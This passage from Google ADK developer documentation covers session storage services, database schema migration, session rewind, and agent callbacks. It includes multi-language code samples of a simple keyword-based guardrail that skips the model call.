- **Requires:** - A Google Cloud project and the Vertex AI SDK (`pip install vertexai`). - A Google Cloud Storage bucket, which you can configure by following this [step](https://cloud.google.com/vertex-ai/docs/pipelines/configure-project#storage). - A Reasoning Engine resource name/ID, which you can set up by following this [tutorial](https://google.github.io/adk-docs/deploy/agent-engine/). - If you do not have a Google Cloud project and you want to try the `VertexAiSessionService`, see [Vertex AI Express Mode](/adk-docs/tools/google-cloud/express-mode/). - **Best for:** Scalable production applications deployed on Google Cloud, especially when integrating with other Vertex AI features. ```py # Requires: pip install google-adk[vertexai] # Plus GCP setup and authentication from google.adk.sessions import VertexAiSessionService PROJECT_ID = "your-gcp-project-id" LOCATION = "us-central1" # The app_name used with this service should be the Reasoning Engine ID or name REASONING_ENGINE_APP_NAME = "projects/your-gcp-project-id/locations/us-central1/reasoningEngines/your-engine-id" session_service = VertexAiSessionService(project=PROJECT_ID, location=LOCATION) # Use REASONING_ENGINE_APP_NAME when calling service methods, e.g.: # session = await session_service.create_session(app_name=REASONING_ENGINE_APP_NAME, ...) ``` ```go import "google.golang.org/adk/session" // 2. 
VertexAIService // Before running, ensure your environment is authenticated: // gcloud auth application-default login // export GOOGLE_CLOUD_PROJECT="your-gcp-project-id" // export GOOGLE_CLOUD_LOCATION="your-gcp-location" modelName := "gemini-flash-latest" // Replace with your desired model vertexService, err := session.VertexAIService(ctx, modelName) if err != nil { log.Printf("Could not initialize VertexAIService (this is expected if the gcloud project is not set): %v", err) } else { fmt.Println("Successfully initialized VertexAIService.") } ``` ```java // Please look at the set of requirements above, consequently export the following in your bashrc file: // export GOOGLE_CLOUD_PROJECT=my_gcp_project // export GOOGLE_CLOUD_LOCATION=us-central1 // export GOOGLE_API_KEY=my_api_key import com.google.adk.sessions.VertexAiSessionService; import java.util.UUID; String sessionId = UUID.randomUUID().toString(); String reasoningEngineAppName = "123456789"; String userId = "u_123"; // Example user id ConcurrentMap initialState = new ConcurrentHashMap<>(); // No initial state needed for this example VertexAiSessionService sessionService = new VertexAiSessionService(); Session mySession = sessionService .createSession(reasoningEngineAppName, userId, initialState, Optional.of(sessionId)) .blockingGet(); ``` ### `DatabaseSessionService` Supported in ADKPython v0.1.0Go v0.1.0 - **How it works:** Connects to a relational database (e.g., PostgreSQL, MySQL, SQLite) to store session data persistently in tables. - **Persistence:** Yes. Data survives application restarts. - **Requires:** A configured database. - **Best for:** Applications needing reliable, persistent storage that you manage yourself. ```py from google.adk.sessions import DatabaseSessionService # Example using a local SQLite file: # Note: The implementation requires an async database driver. # For SQLite, use 'sqlite+aiosqlite' instead of 'sqlite' to ensure async compatibility. 
db_url = "sqlite+aiosqlite:///./my_agent_data.db" session_service = DatabaseSessionService(db_url=db_url) ``` **Async Driver Requirement:** `DatabaseSessionService` requires an async database driver. When using SQLite, you must use `sqlite+aiosqlite` instead of `sqlite` in your connection string. For other databases (PostgreSQL, MySQL), ensure you're using an async-compatible driver, such as `asyncpg` for PostgreSQL or `aiomysql` for MySQL. **Session database schema change in ADK Python v1.22.0:** The schema for the session database changed in ADK Python v1.22.0, and existing session databases should be migrated to the new schema. For more information, see [Session database schema migration](/adk-docs/sessions/session/migrate/). ## The Session Lifecycle Here's a simplified flow of how `Session` and `SessionService` work together during a conversation turn: 1. **Start or Resume:** Your application uses the `SessionService` to either call `create_session` (for a new chat) or reuse an existing session ID. 1. **Context Provided:** The `Runner` retrieves the appropriate `Session` object from the `SessionService`, giving the agent access to that session's `state` and `events`. 1. **Agent Processing:** The user prompts the agent with a query. The agent analyzes the query, and potentially the session `state` and `events` history, to determine the response. 1. **Response & State Update:** The agent generates a response (and potentially flags data to be updated in the `state`). The `Runner` packages this as an `Event`. 1. **Save Interaction:** The `Runner` calls `sessionService.append_event(session, event)`. The service adds the `Event` to the history and updates the session's `state` in storage based on information within the event. The session's `last_update_time` is also updated. 1. **Ready for Next:** The agent's response goes to the user. 
The updated `Session` is now stored by the `SessionService`, ready for the next turn (which restarts the cycle at step 1, usually with the continuation of the conversation in the current session). 1. **End Conversation:** When the conversation is over, your application calls `sessionService.delete_session(...)` to clean up the stored session data if it is no longer required. This cycle highlights how the `SessionService` ensures conversational continuity by managing the history and state associated with each `Session` object. # Session database schema migration Supported in ADKPython v1.22.1 If you are using `DatabaseSessionService` and upgrading to ADK Python release v1.22.0 or higher, you should migrate your database to the new session database schema. Starting with ADK Python release v1.22.0, the database schema for `DatabaseSessionService` has been updated from `v0`, which is a pickle-based serialization, to `v1`, which uses JSON-based serialization. Previous `v0` session schema databases will continue to work with ADK Python v1.22.0 and higher versions, but the `v1` schema may be required in future releases. ## Migrate session database A migration script is provided to facilitate the migration process. The script reads data from your existing database, converts it to the new format, and writes it to a new database. You can run the migration using the ADK Command Line Interface (CLI) `migrate session` command, as shown in the following examples: Required: ADK Python v1.22.1 or higher ADK Python v1.22.1 is required for this procedure because it includes the migration command line interface function and bug fixes to support the session database schema change. 
```bash adk migrate session \ --source_db_url=sqlite:///source.db \ --dest_db_url=sqlite:///dest.db ``` ```bash adk migrate session \ --source_db_url=postgresql://localhost:5432/v0 \ --dest_db_url=postgresql://localhost:5432/v1 ``` After running the migration, update your `DatabaseSessionService` configuration to use the new database URL you specified for `dest_db_url`. # Rewind sessions for agents Supported in ADKPython v1.17.0 The ADK session Rewind feature allows you to revert a session to a previous request state, enabling you to undo mistakes, explore alternative paths, or restart a process from a known good point. This document provides an overview of the feature, how to use it, and its limitations. ## Rewind a session When you rewind a session, you specify a user request, or ***invocation***, that you want to undo, and the system undoes that request and the requests after it. So if you have three requests (A, B, C) and you want to return to the state at request A, you specify B, which undoes the changes from requests B and C. You rewind a session by using the rewind method on a ***Runner*** instance, specifying the user, session, and invocation id, as shown in the following code snippet: ```python # Create runner runner = InMemoryRunner( agent=agent.root_agent, app_name=APP_NAME, ) # Create a session session = await runner.session_service.create_session( app_name=APP_NAME, user_id=USER_ID ) # call agent with wrapper function "call_agent_async()" await call_agent_async( runner, USER_ID, session.id, "set state color to red" ) # ... more agent calls ... 
events_list = await call_agent_async( runner, USER_ID, session.id, "update state color to blue" ) # get invocation id rewind_invocation_id=events_list[1].invocation_id # rewind invocations (state color: red) await runner.rewind_async( user_id=USER_ID, session_id=session.id, rewind_before_invocation_id=rewind_invocation_id, ) ``` When you call the ***rewind*** method, all ADK managed session-level resources are restored to the state they were in *before* the request you specified with the ***invocation id***. However, global resources, such as app-level or user-level state and artifacts, are not restored. For a complete example of an agent session rewind, see the [rewind_session](https://github.com/google/adk-python/tree/main/contributing/samples/rewind_session) sample code. For more information on the limitations of the Rewind feature, see [Limitations](#limitations). ## How it works The Rewind feature creates a special ***rewind*** request that restores the session's state and artifacts to their condition *before* the rewind point specified by an invocation id. This approach means that all requests, including rewound requests, are preserved in the log for later debugging, analysis, or auditing. After the rewind, the system ignores the rewound requests when it prepares the next requests for the AI model. This behavior means the AI model used by the agent effectively forgets any interactions from the rewind point up to the next request. ## Limitations The Rewind feature has some limitations that you should be aware of when using it with your agent workflow: - **Global agent resources:** App-level and user-level state and artifacts are *not* restored by the rewind feature. Only session-level state and artifacts are restored. - **External dependencies:** The rewind feature does not manage external dependencies. If a tool in your agent interacts with external systems, it is your responsibility to handle the restoration of those systems to their prior state. 
- **Atomicity:** State updates, artifact updates, and event persistence are not performed in a single atomic transaction. Therefore, you should avoid rewinding active sessions or concurrently manipulating session artifacts during a rewind to prevent inconsistencies. # Callbacks: Observe, Customize, and Control Agent Behavior Supported in ADKPython v0.1.0TypeScript v0.2.0Go v0.1.0Java v0.1.0 Callbacks are a cornerstone feature of ADK, providing a powerful mechanism to hook into an agent's execution process. They allow you to observe, customize, and even control the agent's behavior at specific, predefined points without modifying the core ADK framework code. **What are they?** In essence, callbacks are standard functions that you define. You then associate these functions with an agent when you create it. The ADK framework automatically calls your functions at key stages, letting you observe or intervene. Think of it like checkpoints during the agent's process: - **Before the agent starts its main work on a request, and after it finishes:** When you ask an agent to do something (e.g., answer a question), it runs its internal logic to figure out the response. - The `Before Agent` callback executes *right before* this main work begins for that specific request. - The `After Agent` callback executes *right after* the agent has finished all its steps for that request and has prepared the final result, but just before the result is returned. - This "main work" encompasses the agent's *entire* process for handling that single request. This might involve deciding to call an LLM, actually calling the LLM, deciding to use a tool, using the tool, processing the results, and finally putting together the answer. These callbacks essentially wrap the whole sequence from receiving the input to producing the final output for that one interaction. 
- **Before sending a request to, or after receiving a response from, the Large Language Model (LLM):** These callbacks (`Before Model`, `After Model`) allow you to inspect or modify the data going to and coming from the LLM specifically. - **Before executing a tool (like a Python function or another agent) or after it finishes:** Similarly, `Before Tool` and `After Tool` callbacks give you control points specifically around the execution of tools invoked by the agent. **Why use them?** Callbacks unlock significant flexibility and enable advanced agent capabilities: - **Observe & Debug:** Log detailed information at critical steps for monitoring and troubleshooting. - **Customize & Control:** Modify data flowing through the agent (like LLM requests or tool results) or even bypass certain steps entirely based on your logic. - **Implement Guardrails:** Enforce safety rules, validate inputs/outputs, or prevent disallowed operations. - **Manage State:** Read or dynamically update the agent's session state during execution. - **Integrate & Enhance:** Trigger external actions (API calls, notifications) or add features like caching. Tip When implementing security guardrails and policies, use ADK Plugins for better modularity and flexibility than Callbacks. For more details, see [Callbacks and Plugins for Security Guardrails](/adk-docs/safety/#callbacks-and-plugins-for-security-guardrails). **How are they added:** Code ```python from google.adk.agents import LlmAgent from google.adk.agents.callback_context import CallbackContext from google.adk.models import LlmResponse, LlmRequest from typing import Optional # --- Define your callback function --- def my_before_model_logic( callback_context: CallbackContext, llm_request: LlmRequest ) -> Optional[LlmResponse]: print(f"Callback running before model call for agent: {callback_context.agent_name}") # ... your custom logic here ... 
return None # Allow the model call to proceed # --- Register it during Agent creation --- my_agent = LlmAgent( name="MyCallbackAgent", model="gemini-2.0-flash", # Or your desired model instruction="Be helpful.", # Other agent parameters... before_model_callback=my_before_model_logic # Pass the function here ) ``` ```typescript import { LlmAgent, InMemoryRunner, CallbackContext, LlmRequest, LlmResponse, Event, isFinalResponse, } from "@google/adk"; import { createUserContent } from "@google/genai"; import type { Content } from "@google/genai"; const MODEL_NAME = "gemini-2.5-flash"; const APP_NAME = "basic_callback_app"; const USER_ID = "test_user_basic"; const SESSION_ID = "session_basic_001"; // --- Define your callback function --- function myBeforeModelLogic({ context, request, }: { context: CallbackContext; request: LlmRequest; }): LlmResponse | undefined { console.log( `Callback running before model call for agent: ${context.agentName}` ); // ... your custom logic here ... return undefined; // Allow the model call to proceed } // --- Register it during Agent creation --- const myAgent = new LlmAgent({ name: "MyCallbackAgent", model: MODEL_NAME, instruction: "Be helpful.", beforeModelCallback: myBeforeModelLogic, }); ``` ```go package main import ( "context" "fmt" "log" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/genai" ) // onBeforeModel is a callback function that gets triggered before an LLM call. func onBeforeModel(ctx agent.CallbackContext, req *model.LLMRequest) (*model.LLMResponse, error) { log.Println("--- onBeforeModel Callback Triggered ---") log.Printf("Model Request to be sent: %v\n", req) // Returning nil allows the default LLM call to proceed. 
return nil, nil } func runBasicExample() { const ( appName = "CallbackBasicApp" userID = "test_user_123" ) ctx := context.Background() geminiModel, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{}) if err != nil { log.Fatalf("Failed to create model: %v", err) } // Register the callback function in the agent configuration. agentCfg := llmagent.Config{ Name: "SimpleAgent", Model: geminiModel, BeforeModelCallbacks: []llmagent.BeforeModelCallback{onBeforeModel}, } simpleAgent, err := llmagent.New(agentCfg) if err != nil { log.Fatalf("Failed to create agent: %v", err) } sessionService := session.InMemoryService() r, err := runner.New(runner.Config{ AppName: appName, Agent: simpleAgent, SessionService: sessionService, }) if err != nil { log.Fatalf("Failed to create runner: %v", err) } ``` ```java import com.google.adk.agents.CallbackContext; import com.google.adk.agents.Callbacks; import com.google.adk.agents.LlmAgent; import com.google.adk.models.LlmRequest; import java.util.Optional; public class AgentWithBeforeModelCallback { public static void main(String[] args) { // --- Define your callback logic --- Callbacks.BeforeModelCallbackSync myBeforeModelLogic = (CallbackContext callbackContext, LlmRequest llmRequest) -> { System.out.println( "Callback running before model call for agent: " + callbackContext.agentName()); // ... your custom logic here ... // Return Optional.empty() to allow the model call to proceed, // similar to returning None in the Python example. // If you wanted to return a response and skip the model call, // you would return Optional.of(yourLlmResponse). return Optional.empty(); }; // --- Register it during Agent creation --- LlmAgent myAgent = LlmAgent.builder() .name("MyCallbackAgent") .model("gemini-2.0-flash") // Or your desired model .instruction("Be helpful.") // Other agent parameters... 
.beforeModelCallbackSync(myBeforeModelLogic) // Pass the callback implementation here .build(); } } ``` ## The Callback Mechanism: Interception and Control When the ADK framework encounters a point where a callback can run (e.g., just before calling the LLM), it checks if you provided a corresponding callback function for that agent. If you did, the framework executes your function. **Context is Key:** Your callback function isn't called in isolation. The framework provides special **context objects** (`CallbackContext` or `ToolContext`) as arguments. These objects contain vital information about the current state of the agent's execution, including the invocation details, session state, and potentially references to services like artifacts or memory. You use these context objects to understand the situation and interact with the framework. (See the dedicated "Context Objects" section for full details). **Controlling the Flow (The Core Mechanism):** The most powerful aspect of callbacks lies in how their **return value** influences the agent's subsequent actions. This is how you intercept and control the execution flow: 1. **`return None` (Allow Default Behavior):** - The specific return type can vary depending on the language. In Java, the equivalent return type is `Optional.empty()`. Refer to the API documentation for language specific guidance. - This is the standard way to signal that your callback has finished its work (e.g., logging, inspection, minor modifications to *mutable* input arguments like `llm_request`) and that the ADK agent should **proceed with its normal operation**. - For `before_*` callbacks (`before_agent`, `before_model`, `before_tool`), returning `None` means the next step in the sequence (running the agent logic, calling the LLM, executing the tool) will occur. 
    - For `after_*` callbacks (`after_agent`, `after_model`, `after_tool`), returning `None` means the result just produced by the preceding step (the agent's output, the LLM's response, the tool's result) will be used as is.
1. **`return <Specific Object>` (Override Default Behavior):**
    - Returning a *specific type of object* (instead of `None`) is how you **override** the ADK agent's default behavior. The framework will use the object you return and *skip* the step that would normally follow or *replace* the result that was just generated.
    - **`before_agent_callback` → `types.Content`**: Skips the agent's main execution logic (`_run_async_impl` / `_run_live_impl`). The returned `Content` object is immediately treated as the agent's final output for this turn. Useful for handling simple requests directly or enforcing access control.
    - **`before_model_callback` → `LlmResponse`**: Skips the call to the external Large Language Model. The returned `LlmResponse` object is processed as if it were the actual response from the LLM. Ideal for implementing input guardrails, prompt validation, or serving cached responses.
    - **`before_tool_callback` → `dict` or `Map`**: Skips the execution of the actual tool function (or sub-agent). The returned `dict` (or `Map`) is used as the result of the tool call, which is then typically passed back to the LLM. Perfect for validating tool arguments, applying policy restrictions, or returning mocked/cached tool results.
    - **`after_agent_callback` → `types.Content`**: *Replaces* the `Content` that the agent's run logic just produced.
    - **`after_model_callback` → `LlmResponse`**: *Replaces* the `LlmResponse` received from the LLM. Useful for sanitizing outputs, adding standard disclaimers, or modifying the LLM's response structure.
    - **`after_tool_callback` → `dict` or `Map`**: *Replaces* the `dict` (or `Map`) result returned by the tool. Allows for post-processing or standardization of tool outputs before they are sent back to the LLM.
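
The return-value convention described above can be illustrated without ADK at all. The following is a toy sketch, not ADK's implementation: `fake_llm`, `run_model_step`, `block_guardrail`, and `add_disclaimer` are hypothetical names, and plain strings stand in for `LlmRequest` and `LlmResponse`. It only models the rule that `None` means "proceed as normal" and any other value means "use this instead".

```python
from typing import Callable, Optional

# Hypothetical callback shapes: take a string, return a string or None.
BeforeCallback = Callable[[str], Optional[str]]
AfterCallback = Callable[[str], Optional[str]]


def fake_llm(prompt: str) -> str:
    """Pretend model call; a real agent would contact an LLM here."""
    return f"model answer to: {prompt}"


def run_model_step(
    prompt: str,
    before: Optional[BeforeCallback] = None,
    after: Optional[AfterCallback] = None,
) -> str:
    """Toy dispatcher that mimics the None-versus-object convention."""
    if before is not None:
        override = before(prompt)
        if override is not None:
            # An object was returned: skip the model call and use it directly.
            # This toy returns immediately and does not model later framework steps.
            return override
    # None was returned (or no callback was set): run the default step.
    response = fake_llm(prompt)
    if after is not None:
        replacement = after(response)
        if replacement is not None:
            # An object was returned: replace the result that was just produced.
            response = replacement
    return response


def block_guardrail(prompt: str) -> Optional[str]:
    """Before-callback: short-circuit when the prompt contains BLOCK."""
    return "blocked by callback" if "BLOCK" in prompt.upper() else None


def add_disclaimer(response: str) -> Optional[str]:
    """After-callback: always replace the response with an annotated copy."""
    return response + " (unverified)"


if __name__ == "__main__":
    print(run_model_step("hello", before=block_guardrail))
    print(run_model_step("please BLOCK this", before=block_guardrail))
    print(run_model_step("hello", after=add_disclaimer))
```

In this sketch the first call reaches `fake_llm` because the guardrail returns `None`, the second never reaches it, and the third shows an after-callback replacing the produced result.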
**Conceptual Code Example (Guardrail):** This example demonstrates the common pattern for a guardrail using `before_model_callback`. Code ```python # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from google.adk.agents import LlmAgent from google.adk.agents.callback_context import CallbackContext from google.adk.models import LlmResponse, LlmRequest from google.adk.runners import Runner from typing import Optional from google.genai import types from google.adk.sessions import InMemorySessionService GEMINI_2_FLASH="gemini-2.0-flash" # --- Define the Callback Function --- def simple_before_model_modifier( callback_context: CallbackContext, llm_request: LlmRequest ) -> Optional[LlmResponse]: """Inspects/modifies the LLM request or skips the call.""" agent_name = callback_context.agent_name print(f"[Callback] Before model call for agent: {agent_name}") # Inspect the last user message in the request contents last_user_message = "" if llm_request.contents and llm_request.contents[-1].role == 'user': if llm_request.contents[-1].parts: last_user_message = llm_request.contents[-1].parts[0].text print(f"[Callback] Inspecting last user message: '{last_user_message}'") # --- Modification Example --- # Add a prefix to the system instruction original_instruction = llm_request.config.system_instruction or types.Content(role="system", parts=[]) prefix = "[Modified by Callback] " # Ensure system_instruction is Content and parts list exists if not 
isinstance(original_instruction, types.Content): # Handle case where it might be a string (though config expects Content) original_instruction = types.Content(role="system", parts=[types.Part(text=str(original_instruction))]) if not original_instruction.parts: original_instruction.parts.append(types.Part(text="")) # Add an empty part if none exist # Modify the text of the first part modified_text = prefix + (original_instruction.parts[0].text or "") original_instruction.parts[0].text = modified_text llm_request.config.system_instruction = original_instruction print(f"[Callback] Modified system instruction to: '{modified_text}'") # --- Skip Example --- # Check if the last user message contains "BLOCK" if "BLOCK" in last_user_message.upper(): print("[Callback] 'BLOCK' keyword found. Skipping LLM call.") # Return an LlmResponse to skip the actual LLM call return LlmResponse( content=types.Content( role="model", parts=[types.Part(text="LLM call was blocked by before_model_callback.")], ) ) else: print("[Callback] Proceeding with LLM call.") # Return None to allow the (modified) request to go to the LLM return None # Create LlmAgent and Assign Callback my_llm_agent = LlmAgent( name="ModelCallbackAgent", model=GEMINI_2_FLASH, instruction="You are a helpful assistant.", # Base instruction description="An LLM agent demonstrating before_model_callback", before_model_callback=simple_before_model_modifier # Assign the function here ) APP_NAME = "guardrail_app" USER_ID = "user_1" SESSION_ID = "session_001" # Session and Runner async def setup_session_and_runner(): session_service = InMemorySessionService() session = await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID) runner = Runner(agent=my_llm_agent, app_name=APP_NAME, session_service=session_service) return session, runner # Agent Interaction async def call_agent_async(query): content = types.Content(role='user', parts=[types.Part(text=query)]) session, runner = await 
setup_session_and_runner() events = runner.run_async(user_id=USER_ID, session_id=SESSION_ID, new_message=content) async for event in events: if event.is_final_response(): final_response = event.content.parts[0].text print("Agent Response: ", final_response) # Note: In Colab, you can directly use 'await' at the top level. # If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop. await call_agent_async("write a joke on BLOCK") ``` ```typescript /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import { LlmAgent, InMemoryRunner, CallbackContext, isFinalResponse, } from "@google/adk"; import { createUserContent } from "@google/genai"; const MODEL_NAME = "gemini-2.5-flash"; const APP_NAME = "before_model_callback_app"; const USER_ID = "test_user_before_model"; const SESSION_ID_BLOCK = "session_block_model_call"; const SESSION_ID_NORMAL = "session_normal_model_call"; // --- Define the Callback Function --- function simpleBeforeModelModifier({ context, request, }: { context: CallbackContext; request: any; }): any | undefined { console.log(`[Callback] Before model call for agent: ${context.agentName}`); // Inspect the last user message in the request contents const lastUserMessage = request.contents?.at(-1)?.parts?.[0]?.text ?? ""; console.log(`[Callback] Inspecting last user message: '${lastUserMessage}'`); // --- Modification Example --- // Add a prefix to the system instruction. 
// We create a deep copy to avoid modifying the original agent's config object. const modifiedConfig = JSON.parse(JSON.stringify(request.config)); const originalInstructionText = modifiedConfig.systemInstruction?.parts?.[0]?.text ?? ""; const prefix = "[Modified by Callback] "; modifiedConfig.systemInstruction = { role: "system", parts: [{ text: prefix + originalInstructionText }], }; request.config = modifiedConfig; // Assign the modified config back to the request console.log( `[Callback] Modified system instruction to: '${modifiedConfig.systemInstruction.parts[0].text}'` ); // --- Skip Example --- // Check if the last user message contains "BLOCK" if (lastUserMessage.toUpperCase().includes("BLOCK")) { console.log("[Callback] 'BLOCK' keyword found. Skipping LLM call."); // Return an LlmResponse to skip the actual LLM call return { content: { role: "model", parts: [ { text: "LLM call was blocked by the before_model_callback." }, ], }, }; } console.log("[Callback] Proceeding with LLM call."); // Return undefined to allow the (modified) request to go to the LLM return undefined; } // --- Create LlmAgent and Assign Callback --- const myLlmAgent = new LlmAgent({ name: "ModelCallbackAgent", model: MODEL_NAME, instruction: "You are a helpful assistant.", // Base instruction description: "An LLM agent demonstrating before_model_callback", beforeModelCallback: simpleBeforeModelModifier, // Assign the function here }); // --- Agent Interaction Logic --- async function callAgentAndPrint( runner: InMemoryRunner, query: string, sessionId: string ) { console.log(`\n>>> Calling Agent with query: "${query}"`); let finalResponseContent = "No final response received."; const events = runner.runAsync({ userId: USER_ID, sessionId, newMessage: createUserContent(query) }); for await (const event of events) { if (isFinalResponse(event) && event.content?.parts?.length) { finalResponseContent = event.content.parts .map((part: { text?: string }) => part.text ?? 
"") .join(""); } } console.log("<<< Agent Response: ", finalResponseContent); } // --- Run Interactions --- async function main() { const runner = new InMemoryRunner({ agent: myLlmAgent, appName: APP_NAME }); // Scenario 1: The callback will find "BLOCK" and skip the model call await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID_BLOCK, }); await callAgentAndPrint( runner, "write a joke about BLOCK", SESSION_ID_BLOCK ); // Scenario 2: The callback will modify the instruction and proceed await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID_NORMAL, }); await callAgentAndPrint(runner, "write a short poem", SESSION_ID_NORMAL); } main(); ``` ```go package main import ( "context" "fmt" "log" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/genai" ) // onBeforeModelGuardrail is a callback that inspects the LLM request. // If it contains a forbidden topic, it blocks the request and returns a // predefined response. Otherwise, it allows the request to proceed. func onBeforeModelGuardrail(ctx agent.CallbackContext, req *model.LLMRequest) (*model.LLMResponse, error) { log.Println("--- onBeforeModelGuardrail Callback Triggered ---") // Inspect the request content for forbidden topics. for _, content := range req.Contents { for _, part := range content.Parts { if strings.Contains(part.Text, "finance") { log.Println("Forbidden topic 'finance' detected. Blocking LLM call.") // By returning a non-nil response, we override the default behavior // and prevent the actual LLM call. return &model.LLMResponse{ Content: &genai.Content{ Parts: []*genai.Part{{Text: "I'm sorry, but I cannot discuss financial topics."}}, Role: "model", }, }, nil } } } log.Println("No forbidden topics found. 
Allowing LLM call to proceed.") // Returning nil allows the default LLM call to proceed. return nil, nil } func runGuardrailExample() { const ( appName = "GuardrailApp" userID = "test_user_456" ) ctx := context.Background() geminiModel, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{}) if err != nil { log.Fatalf("Failed to create model: %v", err) } agentCfg := llmagent.Config{ Name: "ChatAgent", Model: geminiModel, BeforeModelCallbacks: []llmagent.BeforeModelCallback{onBeforeModelGuardrail}, } chatAgent, err := llmagent.New(agentCfg) if err != nil { log.Fatalf("Failed to create agent: %v", err) } sessionService := session.InMemoryService() r, err := runner.New(runner.Config{ AppName: appName, Agent: chatAgent, SessionService: sessionService, }) if err != nil { log.Fatalf("Failed to create runner: %v", err) } ``` ```java import com.google.adk.agents.CallbackContext; import com.google.adk.agents.LlmAgent; import com.google.adk.events.Event; import com.google.adk.models.LlmRequest; import com.google.adk.models.LlmResponse; import com.google.adk.runner.InMemoryRunner; import com.google.adk.sessions.Session; import com.google.genai.types.Content; import com.google.genai.types.GenerateContentConfig; import com.google.genai.types.Part; import io.reactivex.rxjava3.core.Flowable; import java.util.ArrayList; import java.util.List; import java.util.Optional; import java.util.stream.Collectors; public class BeforeModelGuardrailExample { private static final String MODEL_ID = "gemini-2.0-flash"; private static final String APP_NAME = "guardrail_app"; private static final String USER_ID = "user_1"; public static void main(String[] args) { BeforeModelGuardrailExample example = new BeforeModelGuardrailExample(); example.defineAgentAndRun("Tell me about quantum computing. This is a test."); } // --- Define your callback logic --- // Looks for the word "BLOCK" in the user prompt and blocks the call to LLM if found. // Otherwise the LLM call proceeds as usual. 
  public Optional<LlmResponse> simpleBeforeModelModifier(
      CallbackContext callbackContext, LlmRequest llmRequest) {
    System.out.println("[Callback] Before model call for agent: " + callbackContext.agentName());

    // Inspect the last user message in the request contents
    String lastUserMessageText = "";
    List<Content> requestContents = llmRequest.contents();
    if (requestContents != null && !requestContents.isEmpty()) {
      Content lastContent = requestContents.get(requestContents.size() - 1);
      if (lastContent.role().isPresent() && "user".equals(lastContent.role().get())) {
        lastUserMessageText =
            lastContent.parts().orElse(List.of()).stream()
                .flatMap(part -> part.text().stream())
                .collect(Collectors.joining(" ")); // Concatenate text from all parts
      }
    }
    System.out.println("[Callback] Inspecting last user message: '" + lastUserMessageText + "'");

    String prefix = "[Modified by Callback] ";
    GenerateContentConfig currentConfig =
        llmRequest.config().orElse(GenerateContentConfig.builder().build());
    Optional<Content> optOriginalSystemInstruction = currentConfig.systemInstruction();

    Content conceptualModifiedSystemInstruction;
    if (optOriginalSystemInstruction.isPresent()) {
      Content originalSystemInstruction = optOriginalSystemInstruction.get();
      List<Part> originalParts =
          new ArrayList<>(originalSystemInstruction.parts().orElse(List.of()));
      String originalText = "";
      if (!originalParts.isEmpty()) {
        Part firstPart = originalParts.get(0);
        if (firstPart.text().isPresent()) {
          originalText = firstPart.text().get();
        }
        originalParts.set(0, Part.fromText(prefix + originalText));
      } else {
        originalParts.add(Part.fromText(prefix));
      }
      conceptualModifiedSystemInstruction =
          originalSystemInstruction.toBuilder().parts(originalParts).build();
    } else {
      conceptualModifiedSystemInstruction =
          Content.builder()
              .role("system")
              .parts(List.of(Part.fromText(prefix)))
              .build();
    }

    // This demonstrates building a new LlmRequest with the modified config.
llmRequest = llmRequest.toBuilder() .config( currentConfig.toBuilder() .systemInstruction(conceptualModifiedSystemInstruction) .build()) .build(); System.out.println( "[Callback] Conceptually modified system instruction is: '" + llmRequest.config().get().systemInstruction().get().parts().get().get(0).text().get()); // --- Skip Example --- // Check if the last user message contains "BLOCK" if (lastUserMessageText.toUpperCase().contains("BLOCK")) { System.out.println("[Callback] 'BLOCK' keyword found. Skipping LLM call."); LlmResponse skipResponse = LlmResponse.builder() .content( Content.builder() .role("model") .parts( List.of( Part.builder() .text("LLM call was blocked by before_model_callback.") .build())) .build()) .build(); return Optional.of(skipResponse); } System.out.println("[Callback] Proceeding with LLM call."); // Return Optional.empty() to allow the (modified) request to go to the LLM return Optional.empty(); } public void defineAgentAndRun(String prompt) { // --- Create LlmAgent and Assign Callback --- LlmAgent myLlmAgent = LlmAgent.builder() .name("ModelCallbackAgent") .model(MODEL_ID) .instruction("You are a helpful assistant.") // Base instruction .description("An LLM agent demonstrating before_model_callback") .beforeModelCallbackSync(this::simpleBeforeModelModifier) // Assign the callback here .build(); // Session and Runner InMemoryRunner runner = new InMemoryRunner(myLlmAgent, APP_NAME); // InMemoryRunner automatically creates a session service. 
    // Create a session using the service
    Session session = runner.sessionService().createSession(APP_NAME, USER_ID).blockingGet();
    Content userMessage = Content.fromParts(Part.fromText(prompt));

    // Run the agent
    Flowable<Event> eventStream = runner.runAsync(USER_ID, session.id(), userMessage);

    // Stream event response
    eventStream.blockingForEach(
        event -> {
          if (event.finalResponse()) {
            System.out.println(event.stringifyContent());
          }
        });
  }
}
```

By understanding this mechanism of returning `None` versus returning specific objects, you can precisely control the agent's execution path, making callbacks an essential tool for building sophisticated and reliable agents with ADK.

# Design Patterns and Best Practices for Callbacks

Callbacks offer powerful hooks into the agent lifecycle. Here are common design patterns illustrating how to leverage them effectively in ADK, followed by best practices for implementation.

## Design Patterns

These patterns demonstrate typical ways to enhance or control agent behavior using callbacks:

### 1. Guardrails & Policy Enforcement

**Pattern Overview:** Intercept requests before they reach the LLM or tools to enforce rules.

**Implementation:**

- Use `before_model_callback` to inspect the `LlmRequest` prompt
- Use `before_tool_callback` to inspect tool arguments
- If a policy violation is detected (e.g., forbidden topics, profanity):
